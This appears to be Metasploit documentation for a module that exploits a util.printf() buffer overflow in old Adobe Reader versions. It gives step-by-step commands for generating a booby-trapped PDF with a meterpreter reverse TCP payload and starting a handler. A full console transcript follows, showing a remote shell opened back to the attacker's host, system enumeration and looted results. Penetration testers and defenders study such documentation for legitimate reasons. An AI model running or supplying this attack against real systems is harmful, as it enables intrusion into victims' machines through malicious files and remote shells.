Files
metasploit-gs/documentation/modules/exploit/windows/fileformat/adobe_utilprintf.md
T

73 lines
2.6 KiB
Markdown
Raw Normal View History

## Vulnerable Application
2019-12-12 16:57:38 -05:00
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially
crafted pdf that a contains malformed `util.printf()` entry, an attacker may be able to execute arbitrary code.
2019-12-12 16:57:38 -05:00
Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-0-0)
## Verification Steps
2019-12-10 13:37:13 -07:00
1. Install application on the target machine
2. Start msfconsole
2019-12-12 16:57:38 -05:00
3. Do: ```use exploit/windows/fileformat/adobe_utilprintf```
4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
5. Do: ```set LHOST [IP]```
6. Do: ```exploit```
7. Do: ```use exploit/multi/handler```
8. Do: ```set LHOST [IP]```
9. Do: ```exploit```
10. Do: Open PDF on target machine with vulnerable software
## Scenarios
2019-12-12 16:57:38 -05:00
### Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)
```
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(windows/fileformat/adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/adobe_utilprintf) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(windows/fileformat/adobe_utilprintf) > set FILENAME utilprintf.pdf
FILENAME => utilprintf.pdf
msf exploit(windows/fileformat/adobe_utilprintf) > exploit
[*] Creating 'utilprintf.pdf' file...
[+] utilprintf.pdf stored at /root/.msf4/local/utilprintf.pdf
msf exploit(windows/fileformat/adobe_utilprintf) > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit
msf exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Sending stage (180291 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1057) at 2019-12-09 13:47:07 -0700
meterpreter > sysinfo
Computer : COMPUTER_1
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: COMPUTER_1\USER
meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on COMPUTER_1
Installed Applications
======================
Name Version
---- -------
Adobe Reader 8 8.0.0
[+] Results stored in: /root/.msf4/loot/20191209134901_default_192.168.1.5_host.application_066854.txt
```